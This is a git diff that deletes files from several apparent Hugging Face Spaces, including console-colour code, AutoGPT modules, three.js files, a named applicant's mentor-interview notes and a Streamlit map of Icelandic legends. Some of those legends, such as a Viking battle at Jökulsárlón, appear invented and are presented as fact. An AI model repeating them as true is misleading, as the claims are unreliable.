style=None, on_stderr=False): - if style is None: - style = self._default_style - self._style = style - self.set_console(on_stderr=on_stderr) - - def set_console(self, attrs=None, on_stderr=False): - if attrs is None: - attrs = self.get_attrs() - handle = win32.STDOUT - if on_stderr: - handle = win32.STDERR - win32.SetConsoleTextAttribute(handle, attrs) - - def get_position(self, handle): - position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition - # Because Windows coordinates are 0-based, - # and win32.SetConsoleCursorPosition expects 1-based. - position.X += 1 - position.Y += 1 - return position - - def set_cursor_position(self, position=None, on_stderr=False): - if position is None: - # I'm not currently tracking the position, so there is no default. - # position = self.get_position() - return - handle = win32.STDOUT - if on_stderr: - handle = win32.STDERR - win32.SetConsoleCursorPosition(handle, position) - - def cursor_adjust(self, x, y, on_stderr=False): - handle = win32.STDOUT - if on_stderr: - handle = win32.STDERR - position = self.get_position(handle) - adjusted_position = (position.Y + y, position.X + x) - win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False) - - def erase_screen(self, mode=0, on_stderr=False): - # 0 should clear from the cursor to the end of the screen. - # 1 should clear from the cursor to the beginning of the screen. 
- # 2 should clear the entire screen, and move cursor to (1,1) - handle = win32.STDOUT - if on_stderr: - handle = win32.STDERR - csbi = win32.GetConsoleScreenBufferInfo(handle) - # get the number of character cells in the current buffer - cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y - # get number of character cells before current cursor position - cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X - if mode == 0: - from_coord = csbi.dwCursorPosition - cells_to_erase = cells_in_screen - cells_before_cursor - elif mode == 1: - from_coord = win32.COORD(0, 0) - cells_to_erase = cells_before_cursor - elif mode == 2: - from_coord = win32.COORD(0, 0) - cells_to_erase = cells_in_screen - else: - # invalid mode - return - # fill the entire screen with blanks - win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) - # now set the buffer's attributes accordingly - win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord) - if mode == 2: - # put the cursor where needed - win32.SetConsoleCursorPosition(handle, (1, 1)) - - def erase_line(self, mode=0, on_stderr=False): - # 0 should clear from the cursor to the end of the line. - # 1 should clear from the cursor to the beginning of the line. - # 2 should clear the entire line. - handle = win32.STDOUT - if on_stderr: - handle = win32.STDERR - csbi = win32.GetConsoleScreenBufferInfo(handle) - if mode == 0: - from_coord = csbi.dwCursorPosition - cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X - elif mode == 1: - from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) - cells_to_erase = csbi.dwCursorPosition.X - elif mode == 2: - from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) - cells_to_erase = csbi.dwSize.X - else: - # invalid mode - return - # fill the entire screen with blanks - win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) - # now set the buffer's attributes accordingly - win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord) - - def set_title(self, title): - win32.SetConsoleTitle(title) - - -def enable_vt_processing(fd): - if win32.windll is None or not win32.winapi_test(): - return False - - try: - handle = get_osfhandle(fd) - mode = win32.GetConsoleMode(handle) - win32.SetConsoleMode( - handle, - mode | win32.ENABLE_VIRTUAL_TERMINAL_PROCESSING, - ) - - mode = win32.GetConsoleMode(handle) - if mode & win32.ENABLE_VIRTUAL_TERMINAL_PROCESSING: - return True - # Can get TypeError in testsuite where 'fd' is a Mock() - except (OSError, TypeError): - return False diff --git a/spaces/aryadytm/remove-photo-background/README.md b/spaces/aryadytm/remove-photo-background/README.md deleted file mode 100644 index b193cc66a68130609c2a555e6c3ebdb710abd3d3..0000000000000000000000000000000000000000 --- a/spaces/aryadytm/remove-photo-background/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Remove Photo Background -emoji: 😻 -colorFrom: green -colorTo: indigo -sdk: streamlit -sdk_version: 1.2.0 -python_version: 3.9.5 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces#reference diff --git a/spaces/at2507/SM_NLP_RecoSys/Data/Mentor_interviews/Saurav Roy.html b/spaces/at2507/SM_NLP_RecoSys/Data/Mentor_interviews/Saurav Roy.html deleted file mode 100644 index 111393c0c3b1c4cba0b254c0985723da03c5cbf6..0000000000000000000000000000000000000000 --- a/spaces/at2507/SM_NLP_RecoSys/Data/Mentor_interviews/Saurav Roy.html +++ /dev/null @@ -1,136 
+0,0 @@ - - - - Saurav Roy - - - - -
    -

    Saurav Roy

    - -
    -

    Application

    There are very few dedicated data engineering programs compared to computer science and data science programs.
    I have a computer science background, have moved into data engineering, and have transitioned from individual contributor to manager.

    So, I want to give back to the engineering community by empowering people with practical job search tips & tricks and transition advice to the data engineering field.


    Interview


    How did you hear about SM?
    • A friend of mine suggested it to me

    Mentorship experience?
    • TA from 2016 to 2019 (during undergrad)
      • intro CS etc
    • At work, collaborated a lot. Now I have one co-op student and some full-time folks coming under me
    • lots of interview experience
    • At Scotiabank - using data within Scotiabank

    What are beginners lacking?
    • Lots of DS courses, but in reality, companies need DEs
    • You're basically good if you have a CS background (SQL)
      • Measuring data quality? Whose job is that?
      • Roles change from company to company, pay close attention to the role and the interview
    • SQL skills! Distributed computing (Airflow); a short SQL example follows this list
      • Spark / Pandas
    • If you don't have that CS background, it's a bigger challenge
    • Start with coding
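    A rough illustration of the "SQL skills" point above (my own sketch, not something from the interview): one pattern that comes up constantly in data engineering screens is picking the latest record per key with a window function. Using only the Python standard library:

import sqlite3

# Window functions need SQLite >= 3.25, which recent Python builds bundle.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE events (user_id INTEGER, ts TEXT, status TEXT);
    INSERT INTO events VALUES
        (1, '2023-01-01', 'signed_up'),
        (1, '2023-02-01', 'active'),
        (2, '2023-01-15', 'signed_up');
""")

# ROW_NUMBER() over a per-user window keeps only the most recent row per user.
rows = conn.execute("""
    SELECT user_id, ts, status
    FROM (
        SELECT *,
               ROW_NUMBER() OVER (PARTITION BY user_id ORDER BY ts DESC) AS rn
        FROM events
    )
    WHERE rn = 1
    ORDER BY user_id;
""").fetchall()

print(rows)  # [(1, '2023-02-01', 'active'), (2, '2023-01-15', 'signed_up')]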
    And how can you help?
    • Do one demonstrable project
      • Have like 4/5 files in Databricks
      • Scheduling experience (Airflow); a minimal DAG sketch follows this list
      • Hands-on experience also gives confidence, and you can re-use it in the future
    • Share my experience of getting a job
    • Interview prep (common SQL tricks, LeetCode)
    • encourage SE to start with DE, DS can come later
    • general career mindset - long-term planning (also you need money to survive)
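    To make the "demonstrable project" advice above concrete, here is a minimal sketch (my own illustration, assuming Airflow 2.x, not something from the interview) of a small daily extract-transform-load DAG of the kind that shows scheduling experience:

from datetime import datetime

from airflow import DAG
from airflow.operators.python import PythonOperator


def extract():
    ...  # e.g. pull a public API or read raw files


def transform():
    ...  # e.g. clean and validate with pandas or Spark


def load():
    ...  # e.g. write the result to a warehouse table


with DAG(
    dag_id="demo_daily_pipeline",   # hypothetical name, just for illustration
    start_date=datetime(2023, 1, 1),
    schedule_interval="@daily",     # one run per day
    catchup=False,
) as dag:
    t_extract = PythonOperator(task_id="extract", python_callable=extract)
    t_transform = PythonOperator(task_id="transform", python_callable=transform)
    t_load = PythonOperator(task_id="load", python_callable=load)

    # Linear dependency chain: extract -> transform -> load
    t_extract >> t_transform >> t_load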
    -
    -


    Questions about SM?
    • How many DE mentees?
    • How long does the mentorship last?
    • What if my mentees get hired before the mentorship ends?
    • What about equity? Can I change my agreement to add equity?
    • Can I charge 8%?
    • How do you verify income?
    -
    -


    I told him he was accepted, but he asked a lot about payment details and how to make the most money, which made me uneasy
    -
    - -
    - - - \ No newline at end of file diff --git a/spaces/avivdm1/AutoGPT/autogpt/llm_utils.py b/spaces/avivdm1/AutoGPT/autogpt/llm_utils.py deleted file mode 100644 index 821820ffab07be2753cf385ff1de77820e4206ee..0000000000000000000000000000000000000000 --- a/spaces/avivdm1/AutoGPT/autogpt/llm_utils.py +++ /dev/null @@ -1,172 +0,0 @@ -from __future__ import annotations - -import time -from ast import List - -import openai -from colorama import Fore, Style -from openai.error import APIError, RateLimitError - -from autogpt.config import Config -from autogpt.logs import logger - -CFG = Config() - -openai.api_key = CFG.openai_api_key - - -def call_ai_function( - function: str, args: list, description: str, model: str | None = None -) -> str: - """Call an AI function - - This is a magic function that can do anything with no-code. See - https://github.com/Torantulino/AI-Functions for more info. - - Args: - function (str): The function to call - args (list): The arguments to pass to the function - description (str): The description of the function - model (str, optional): The model to use. Defaults to None. - - Returns: - str: The response from the function - """ - if model is None: - model = CFG.smart_llm_model - # For each arg, if any are None, convert to "None": - args = [str(arg) if arg is not None else "None" for arg in args] - # parse args to comma separated string - args = ", ".join(args) - messages = [ - { - "role": "system", - "content": f"You are now the following python function: ```# {description}" - f"\n{function}```\n\nOnly respond with your `return` value.", - }, - {"role": "user", "content": args}, - ] - - return create_chat_completion(model=model, messages=messages, temperature=0) - - -# Overly simple abstraction until we create something better -# simple retry mechanism when getting a rate error or a bad gateway -def create_chat_completion( - messages: list, # type: ignore - model: str | None = None, - temperature: float = CFG.temperature, - max_tokens: int | None = None, -) -> str: - """Create a chat completion using the OpenAI API - - Args: - messages (list[dict[str, str]]): The messages to send to the chat completion - model (str, optional): The model to use. Defaults to None. - temperature (float, optional): The temperature to use. Defaults to 0.9. - max_tokens (int, optional): The max tokens to use. Defaults to None. - - Returns: - str: The response from the chat completion - """ - response = None - num_retries = 10 - warned_user = False - if CFG.debug_mode: - print( - Fore.GREEN - + f"Creating chat completion with model {model}, temperature {temperature}," - f" max_tokens {max_tokens}" + Fore.RESET - ) - for attempt in range(num_retries): - backoff = 2 ** (attempt + 2) - try: - if CFG.use_azure: - response = openai.ChatCompletion.create( - deployment_id=CFG.get_azure_deployment_id_for_model(model), - model=model, - messages=messages, - temperature=temperature, - max_tokens=max_tokens, - ) - else: - response = openai.ChatCompletion.create( - model=model, - messages=messages, - temperature=temperature, - max_tokens=max_tokens, - ) - break - except RateLimitError: - if CFG.debug_mode: - print( - Fore.RED + "Error: ", - f"Reached rate limit, passing..." + Fore.RESET, - ) - if not warned_user: - logger.double_check( - f"Please double check that you have setup a {Fore.CYAN + Style.BRIGHT}PAID{Style.RESET_ALL} OpenAI API Account. 
" - + f"You can read more here: {Fore.CYAN}https://github.com/Significant-Gravitas/Auto-GPT#openai-api-keys-configuration{Fore.RESET}" - ) - warned_user = True - except APIError as e: - if e.http_status == 502: - pass - else: - raise - if attempt == num_retries - 1: - raise - if CFG.debug_mode: - print( - Fore.RED + "Error: ", - f"API Bad gateway. Waiting {backoff} seconds..." + Fore.RESET, - ) - time.sleep(backoff) - if response is None: - logger.typewriter_log( - "FAILED TO GET RESPONSE FROM OPENAI", - Fore.RED, - "Auto-GPT has failed to get a response from OpenAI's services. " - + f"Try running Auto-GPT again, and if the problem the persists try running it with `{Fore.CYAN}--debug{Fore.RESET}`.", - ) - logger.double_check() - if CFG.debug_mode: - raise RuntimeError(f"Failed to get response after {num_retries} retries") - else: - quit(1) - - return response.choices[0].message["content"] - - -def create_embedding_with_ada(text) -> list: - """Create an embedding with text-ada-002 using the OpenAI SDK""" - num_retries = 10 - for attempt in range(num_retries): - backoff = 2 ** (attempt + 2) - try: - if CFG.use_azure: - return openai.Embedding.create( - input=[text], - engine=CFG.get_azure_deployment_id_for_model( - "text-embedding-ada-002" - ), - )["data"][0]["embedding"] - else: - return openai.Embedding.create( - input=[text], model="text-embedding-ada-002" - )["data"][0]["embedding"] - except RateLimitError: - pass - except APIError as e: - if e.http_status == 502: - pass - else: - raise - if attempt == num_retries - 1: - raise - if CFG.debug_mode: - print( - Fore.RED + "Error: ", - f"API Bad gateway. Waiting {backoff} seconds..." + Fore.RESET, - ) - time.sleep(backoff) diff --git a/spaces/avivdm1/AutoGPT/autogpt/memory/no_memory.py b/spaces/avivdm1/AutoGPT/autogpt/memory/no_memory.py deleted file mode 100644 index 0371e96ae89f5eb88dae019a66351a229596ed7a..0000000000000000000000000000000000000000 --- a/spaces/avivdm1/AutoGPT/autogpt/memory/no_memory.py +++ /dev/null @@ -1,73 +0,0 @@ -"""A class that does not store any data. This is the default memory provider.""" -from __future__ import annotations - -from typing import Any - -from autogpt.memory.base import MemoryProviderSingleton - - -class NoMemory(MemoryProviderSingleton): - """ - A class that does not store any data. This is the default memory provider. - """ - - def __init__(self, cfg): - """ - Initializes the NoMemory provider. - - Args: - cfg: The config object. - - Returns: None - """ - pass - - def add(self, data: str) -> str: - """ - Adds a data point to the memory. No action is taken in NoMemory. - - Args: - data: The data to add. - - Returns: An empty string. - """ - return "" - - def get(self, data: str) -> list[Any] | None: - """ - Gets the data from the memory that is most relevant to the given data. - NoMemory always returns None. - - Args: - data: The data to compare to. - - Returns: None - """ - return None - - def clear(self) -> str: - """ - Clears the memory. No action is taken in NoMemory. - - Returns: An empty string. - """ - return "" - - def get_relevant(self, data: str, num_relevant: int = 5) -> list[Any] | None: - """ - Returns all the data in the memory that is relevant to the given data. - NoMemory always returns None. - - Args: - data: The data to compare to. - num_relevant: The number of relevant data to return. - - Returns: None - """ - return None - - def get_stats(self): - """ - Returns: An empty dictionary as there are no stats in NoMemory. 
- """ - return {} diff --git a/spaces/awacke1/Maps.Markers.Honor.Iceland/app.py b/spaces/awacke1/Maps.Markers.Honor.Iceland/app.py deleted file mode 100644 index bd080a54b598011a87a39b27b8e9f48e13f7adfc..0000000000000000000000000000000000000000 --- a/spaces/awacke1/Maps.Markers.Honor.Iceland/app.py +++ /dev/null @@ -1,104 +0,0 @@ -import streamlit as st -import folium -from streamlit_folium import folium_static -from folium.plugins import MarkerCluster - -# Define mythological places data for Iceland -mythological_places = [ - ('Ásbyrgi', 66.0082, -16.5096, 'Ásbyrgi is a horseshoe-shaped canyon, believed to have been formed by the hoof of Odin\'s eight-legged horse, Sleipnir.'), - ('Dimmuborgir', 65.6083, -16.8996, 'Dimmuborgir, or "Dark Cities," is a lava field with dramatic rock formations. It is said to be the dwelling of trolls and elves.'), - ('Hekla', 63.9920, -19.6656, 'Hekla is a stratovolcano believed to be the gateway to hell in the Middle Ages. It was also rumored to be a meeting place for witches.'), - ('Elliðaey', 63.4845, -20.2785, 'Elliðaey is an isolated island, where, according to legend, a mythical monster called the skoffin, a hybrid of a cat and a fox, is said to have lived.'), - ('Mývatn', 65.6039, -16.9965, 'Mývatn is a volcanic lake surrounded by unique geological formations. The area is steeped in folklore and is said to be home to various supernatural beings.'), - ('Djúpalónssandur', 64.7439, -23.9033, 'Djúpalónssandur is a black sand beach, where, according to legend, a supernatural seal woman appeared and was captured by a fisherman.'), - ('Reykjadalur', 64.0333, -21.2167, 'Reykjadalur, or "Steam Valley," is a geothermal area with hot springs. It is believed to be the home of hidden people, who live in the rocks and hills.'), - ('Snaefellsjokull', 64.8080, -23.7767, 'Snaefellsjokull is a glacier-capped volcano that inspired Jules Verne\'s "Journey to the Center of the Earth." It is believed to hold mystical powers.'), - ('Jokulsarlon', 64.0784, -16.2300, 'Jokulsarlon is a glacial lagoon that is said to be the site of an ancient Viking battle, where warriors fought for control of the area.'), - ('Vatnajokull', 64.4150, -16.8333, 'Vatnajokull is Europe\'s largest glacier, and according to legend, it was formed by the tears of a grieving giantess.') -] - -# Create a map centered on Iceland -m = folium.Map(location=[65.0, -18.0], zoom_start=7) - -# Add markers for each mythological place and add them to a MarkerCluster -marker_cluster = MarkerCluster().add_to(m) -for place in mythological_places: - folium.Marker( - location=[place[1], place[2]], - popup=f'{place[0]}
    {place[3]}', - icon=folium.Icon(color='red') - ).add_to(marker_cluster) - -# Add PolyLine for paths between markers with animation -locations = [place[1:3] for place in mythological_places] -path = folium.PolyLine(locations, color='blue', opacity=0.8, weight=5, smooth_factor=0.5).add_to(m) -folium.plugins.PolyLineTextPath(polyline=path, text='\u25BA', repeat=True, offset=6, attributes={'fill': 'blue', 'font-weight': 'bold', 'font-size': '12'}).add_to(path) - -folium_static(m) - -st.markdown(""" -# Icelandic Mythological Places - -The map above shows the location of various mythological places in Iceland. Hover over the markers to learn more about the stories behind each location. - -""") - - -# Add markers for each mythological place -for place in mythological_places: - folium.Marker( - location=[place[1], place[2]], - popup=f'{place[0]}
    {place[3]}', - icon=folium.Icon(color='red') - ).add_to(m) - -# Function to update the map when a button is clicked -def update_map(place_data): - m.location = [place_data[1], place_data[2]] - m.zoom_start = 13 - folium_static(m) - - -for i in range(0, len(mythological_places), 3): - cols = st.columns(3) - for j in range(3): - if i + j < len(mythological_places): - with cols[j]: - if st.button(mythological_places[i + j][0]): - update_map(mythological_places[i + j]) -folium_static(m) - -st.markdown(""" - -Ásbyrgi: Thor, trying to prove his strength, challenged Sleipnir to a race. Odin agreed, but secretly fed Sleipnir his favorite snack, lightning bolts. With each step, Sleipnir left a massive print, and thus, Ásbyrgi was formed. - -Dimmuborgir: Loki, the trickster, held a housewarming party for the trolls and elves in Dimmuborgir. He spiced the food with a touch of mischief, causing everyone to break into spontaneous, ridiculous dances that lasted for days. - -Hekla: Freyja, the goddess of love, hosted a witches' convention on Hekla to improve their matchmaking skills. The witches accidentally brewed a love potion so powerful that it caused the volcano to erupt with passion. - -Elliðaey: The skoffin, tired of its isolation, devised a plan to hitch a ride off the island. It disguised itself as a mythical creature tour guide, successfully luring a boat full of curious tourists to Elliðaey. - -Mývatn: Balder, the god of light, organized a contest for the supernatural beings of Mývatn. The prize was an all-expenses-paid vacation to sunny Valhalla. The competition was fierce, with participants showing off their most impressive magic tricks. - -""") - - -st.markdown(""" -🏝️ Elliðaey Island: Home of the Skoffin -Elliðaey is a stunning and isolated island located off the southern coast of Iceland 🇮🇸. The island boasts a picturesque landscape and unique wildlife, including a legendary creature known as the skoffin 🐱‍🦲. - -Legend has it that the skoffin is a rare hybrid of a cat 🐱 and a fox 🦊, with a long tail and sharp teeth. The creature is incredibly elusive and is said to only appear to those who are pure of heart ❤️. Those who are lucky enough to spot the skoffin will be blessed with good luck and fortune 🍀. - -Despite its mythical reputation, Elliðaey has a long history of human habitation. In the 10th century, Viking settlers used the island for fishing 🎣 and farming 🌾. Throughout the centuries, the island has been used for a variety of purposes, including as a place of exile and as a hideaway for smugglers 🏴‍☠️. - -In the 1950s, a hunting lodge was built on the island, attracting wealthy hunters who came to Elliðaey to hunt puffins 🐧. However, the lodge was abandoned in the 1980s, and the island is now uninhabited 🏚️. - -Today, Elliðaey remains a popular destination for hikers 🚶‍♀️ and bird watchers 🦜 who come to enjoy the island's natural beauty and abundant wildlife 🌿. The island's fascinating history, legends, and stories continue to capture the imagination of those who visit 💭. Who knows, you might even catch a glimpse of the elusive skoffin 🤩! 
- - - - - -Regenerate response -""") - \ No newline at end of file diff --git a/spaces/awacke1/VizLib-GraphViz-SwimLanes-Digraph-ForMLLifecycle/app.py b/spaces/awacke1/VizLib-GraphViz-SwimLanes-Digraph-ForMLLifecycle/app.py deleted file mode 100644 index 7e1694ac065a1452bb436ad8e86203d7c7ec3ee3..0000000000000000000000000000000000000000 --- a/spaces/awacke1/VizLib-GraphViz-SwimLanes-Digraph-ForMLLifecycle/app.py +++ /dev/null @@ -1,74 +0,0 @@ -import streamlit as st -from graphviz import Digraph - -# Define the emoji to use for the swim lanes -SWIM_LANES = { - "Data Pipelines": "🔍", - "Build and Train Models": "🧪", - "Deploy and Predict": "🚀" -} - -# Define the graph structure -graph = Digraph() -graph.attr(rankdir="TB") # Top to Bottom or LR Left to Right -graph.attr(fontsize="20") -graph.attr(compound="true") -graph.attr(nodesep="0.5") - -# Define the nodes -graph.node("📊 Data Collection") -graph.node("🧹 Data Cleaning") -graph.node("🔧 Data Transformation") -graph.node("🔎 Feature Engineering") -graph.node("⚙️ Model Selection") -graph.node("🎓 Model Training") -graph.node("🚢 Model Deployment") -graph.node("📡 Model Serving") -graph.node("🔮 Predictions") -graph.node("👍 Feedback Collection") -graph.node("🤔 Feedback Processing") -graph.node("✍️ Model Updating") - -# Add the edges -graph.edge("📊 Data Collection", "🧹 Data Cleaning") -graph.edge("🧹 Data Cleaning", "🔧 Data Transformation") -graph.edge("🔧 Data Transformation", "🔎 Feature Engineering") -graph.edge("🔎 Feature Engineering", "⚙️ Model Selection") -graph.edge("⚙️ Model Selection", "🎓 Model Training") -graph.edge("🎓 Model Training", "🚢 Model Deployment") -graph.edge("🚢 Model Deployment", "📡 Model Serving") -graph.edge("📡 Model Serving", "🔮 Predictions") -graph.edge("🔮 Predictions", "👍 Feedback Collection") -graph.edge("👍 Feedback Collection", "🤔 Feedback Processing") -graph.edge("🤔 Feedback Processing", "✍️ Model Updating") -graph.edge("✍️ Model Updating", "🎓 Model Training") - -# Add the swim lanes -with graph.subgraph(name="cluster_0") as c: - c.attr(rank="1") - c.attr(label=SWIM_LANES["Data Pipelines"]) - c.edge("📊 Data Collection", "🧹 Data Cleaning", style="invis") - c.edge("🧹 Data Cleaning", "🔧 Data Transformation", style="invis") - -with graph.subgraph(name="cluster_1") as c: - c.attr(rank="2") - c.attr(label=SWIM_LANES["Build and Train Models"]) - c.edge("🔎 Feature Engineering", "⚙️ Model Selection", style="invis") - c.edge("⚙️ Model Selection", "🎓 Model Training", style="invis") - -with graph.subgraph(name="cluster_2") as c: - c.attr(rank="3") - c.attr(label=SWIM_LANES["Deploy and Predict"]) - c.edge("🚢 Model Deployment", "📡 Model Serving", style="invis") - c.edge("📡 Model Serving", "🔮 Predictions", style="invis") - -with graph.subgraph(name="cluster_3") as c: - c.attr(rank="4") - c.attr(label="Reinforcement Learning Human Feedback") - c.edge("🔮 Predictions", "👍 Feedback Collection", style="invis") - c.edge("👍 Feedback Collection", "🤔 Feedback Processing", style="invis") - c.edge("🤔 Feedback Processing", "✍️ Model Updating", style="invis") - -# Render the graph in Streamlit -# st.graphviz_chart(graph.source) -st.graphviz_chart(graph.source) \ No newline at end of file diff --git a/spaces/banana-projects/web3d/node_modules/three/examples/js/nodes/procedural/CheckerNode.js b/spaces/banana-projects/web3d/node_modules/three/examples/js/nodes/procedural/CheckerNode.js deleted file mode 100644 index 42d1b84ff21cdeeb7af1b5f9bc803bd6bf5b6005..0000000000000000000000000000000000000000 --- 
a/spaces/banana-projects/web3d/node_modules/three/examples/js/nodes/procedural/CheckerNode.js +++ /dev/null @@ -1,75 +0,0 @@ -/** - * @author sunag / http://www.sunag.com.br/ - */ - -import { TempNode } from '../core/TempNode.js'; -import { FunctionNode } from '../core/FunctionNode.js'; -import { UVNode } from '../accessors/UVNode.js'; - -function CheckerNode( uv ) { - - TempNode.call( this, 'f' ); - - this.uv = uv || new UVNode(); - -} - -CheckerNode.prototype = Object.create( TempNode.prototype ); -CheckerNode.prototype.constructor = CheckerNode; -CheckerNode.prototype.nodeType = "Noise"; - -CheckerNode.Nodes = ( function () { - - // https://github.com/mattdesl/glsl-checker/blob/master/index.glsl - - var checker = new FunctionNode( [ - "float checker( vec2 uv ) {", - - " float cx = floor( uv.x );", - " float cy = floor( uv.y ); ", - " float result = mod( cx + cy, 2.0 );", - - " return sign( result );", - - "}" - ].join( "\n" ) ); - - return { - checker: checker - }; - -} )(); - -CheckerNode.prototype.generate = function ( builder, output ) { - - var snoise = builder.include( CheckerNode.Nodes.checker ); - - return builder.format( snoise + '( ' + this.uv.build( builder, 'v2' ) + ' )', this.getType( builder ), output ); - -}; - -CheckerNode.prototype.copy = function ( source ) { - - TempNode.prototype.copy.call( this, source ); - - this.uv = source.uv; - -}; - -CheckerNode.prototype.toJSON = function ( meta ) { - - var data = this.getJSONNode( meta ); - - if ( ! data ) { - - data = this.createJSONNode( meta ); - - data.uv = this.uv.toJSON( meta ).uuid; - - } - - return data; - -}; - -export { CheckerNode }; diff --git a/spaces/banana-projects/web3d/node_modules/three/examples/js/shaders/TriangleBlurShader.js b/spaces/banana-projects/web3d/node_modules/three/examples/js/shaders/TriangleBlurShader.js deleted file mode 100644 index ae9ef55e691b438581af89a38eb8aba735ee676d..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/examples/js/shaders/TriangleBlurShader.js +++ /dev/null @@ -1,72 +0,0 @@ -/** - * @author zz85 / http://www.lab4games.net/zz85/blog - * - * Triangle blur shader - * based on glfx.js triangle blur shader - * https://github.com/evanw/glfx.js - * - * A basic blur filter, which convolves the image with a - * pyramid filter. The pyramid filter is separable and is applied as two - * perpendicular triangle filters. 
- */ - -THREE.TriangleBlurShader = { - - uniforms : { - - "texture": { value: null }, - "delta": { value: new THREE.Vector2( 1, 1 ) } - - }, - - vertexShader: [ - - "varying vec2 vUv;", - - "void main() {", - - "vUv = uv;", - "gl_Position = projectionMatrix * modelViewMatrix * vec4( position, 1.0 );", - - "}" - - ].join( "\n" ), - - fragmentShader: [ - - "#include ", - - "#define ITERATIONS 10.0", - - "uniform sampler2D texture;", - "uniform vec2 delta;", - - "varying vec2 vUv;", - - "void main() {", - - "vec4 color = vec4( 0.0 );", - - "float total = 0.0;", - - // randomize the lookup values to hide the fixed number of samples - - "float offset = rand( vUv );", - - "for ( float t = -ITERATIONS; t <= ITERATIONS; t ++ ) {", - - "float percent = ( t + offset - 0.5 ) / ITERATIONS;", - "float weight = 1.0 - abs( percent );", - - "color += texture2D( texture, vUv + delta * percent ) * weight;", - "total += weight;", - - "}", - - "gl_FragColor = color / total;", - - "}" - - ].join( "\n" ) - -}; diff --git a/spaces/banana-projects/web3d/node_modules/three/src/helpers/SkeletonHelper.js b/spaces/banana-projects/web3d/node_modules/three/src/helpers/SkeletonHelper.js deleted file mode 100644 index 0756de3a26822cb5e3afe8c38ca304b1d6436cb8..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/src/helpers/SkeletonHelper.js +++ /dev/null @@ -1,128 +0,0 @@ -/** - * @author Sean Griffin / http://twitter.com/sgrif - * @author Michael Guerrero / http://realitymeltdown.com - * @author mrdoob / http://mrdoob.com/ - * @author ikerr / http://verold.com - * @author Mugen87 / https://github.com/Mugen87 - */ - -import { LineSegments } from '../objects/LineSegments.js'; -import { Matrix4 } from '../math/Matrix4.js'; -import { VertexColors } from '../constants.js'; -import { LineBasicMaterial } from '../materials/LineBasicMaterial.js'; -import { Color } from '../math/Color.js'; -import { Vector3 } from '../math/Vector3.js'; -import { BufferGeometry } from '../core/BufferGeometry.js'; -import { Float32BufferAttribute } from '../core/BufferAttribute.js'; -import { Object3D } from '../core/Object3D.js'; - -function getBoneList( object ) { - - var boneList = []; - - if ( object && object.isBone ) { - - boneList.push( object ); - - } - - for ( var i = 0; i < object.children.length; i ++ ) { - - boneList.push.apply( boneList, getBoneList( object.children[ i ] ) ); - - } - - return boneList; - -} - -function SkeletonHelper( object ) { - - var bones = getBoneList( object ); - - var geometry = new BufferGeometry(); - - var vertices = []; - var colors = []; - - var color1 = new Color( 0, 0, 1 ); - var color2 = new Color( 0, 1, 0 ); - - for ( var i = 0; i < bones.length; i ++ ) { - - var bone = bones[ i ]; - - if ( bone.parent && bone.parent.isBone ) { - - vertices.push( 0, 0, 0 ); - vertices.push( 0, 0, 0 ); - colors.push( color1.r, color1.g, color1.b ); - colors.push( color2.r, color2.g, color2.b ); - - } - - } - - geometry.addAttribute( 'position', new Float32BufferAttribute( vertices, 3 ) ); - geometry.addAttribute( 'color', new Float32BufferAttribute( colors, 3 ) ); - - var material = new LineBasicMaterial( { vertexColors: VertexColors, depthTest: false, depthWrite: false, transparent: true } ); - - LineSegments.call( this, geometry, material ); - - this.root = object; - this.bones = bones; - - this.matrix = object.matrixWorld; - this.matrixAutoUpdate = false; - -} - -SkeletonHelper.prototype = Object.create( LineSegments.prototype ); -SkeletonHelper.prototype.constructor = 
SkeletonHelper; - -SkeletonHelper.prototype.updateMatrixWorld = function () { - - var vector = new Vector3(); - - var boneMatrix = new Matrix4(); - var matrixWorldInv = new Matrix4(); - - return function updateMatrixWorld( force ) { - - var bones = this.bones; - - var geometry = this.geometry; - var position = geometry.getAttribute( 'position' ); - - matrixWorldInv.getInverse( this.root.matrixWorld ); - - for ( var i = 0, j = 0; i < bones.length; i ++ ) { - - var bone = bones[ i ]; - - if ( bone.parent && bone.parent.isBone ) { - - boneMatrix.multiplyMatrices( matrixWorldInv, bone.matrixWorld ); - vector.setFromMatrixPosition( boneMatrix ); - position.setXYZ( j, vector.x, vector.y, vector.z ); - - boneMatrix.multiplyMatrices( matrixWorldInv, bone.parent.matrixWorld ); - vector.setFromMatrixPosition( boneMatrix ); - position.setXYZ( j + 1, vector.x, vector.y, vector.z ); - - j += 2; - - } - - } - - geometry.getAttribute( 'position' ).needsUpdate = true; - - Object3D.prototype.updateMatrixWorld.call( this, force ); - - }; - -}(); - -export { SkeletonHelper }; diff --git a/spaces/banana-projects/web3d/node_modules/three/src/materials/MeshStandardMaterial.d.ts b/spaces/banana-projects/web3d/node_modules/three/src/materials/MeshStandardMaterial.d.ts deleted file mode 100644 index 7fca97f515a46bf331636754fcc6c362e7298d13..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/src/materials/MeshStandardMaterial.d.ts +++ /dev/null @@ -1,73 +0,0 @@ -import { Color } from './../math/Color'; -import { Texture } from './../textures/Texture'; -import { Vector2 } from './../math/Vector2'; -import { MaterialParameters, Material } from './Material'; - -export interface MeshStandardMaterialParameters extends MaterialParameters { - color?: Color | string | number; - roughness?: number; - metalness?: number; - map?: Texture; - lightMap?: Texture; - lightMapIntensity?: number; - aoMap?: Texture; - aoMapIntensity?: number; - emissive?: Color | string | number; - emissiveIntensity?: number; - emissiveMap?: Texture; - bumpMap?: Texture; - bumpScale?: number; - normalMap?: Texture; - normalScale?: Vector2; - displacementMap?: Texture; - displacementScale?: number; - displacementBias?: number; - roughnessMap?: Texture; - metalnessMap?: 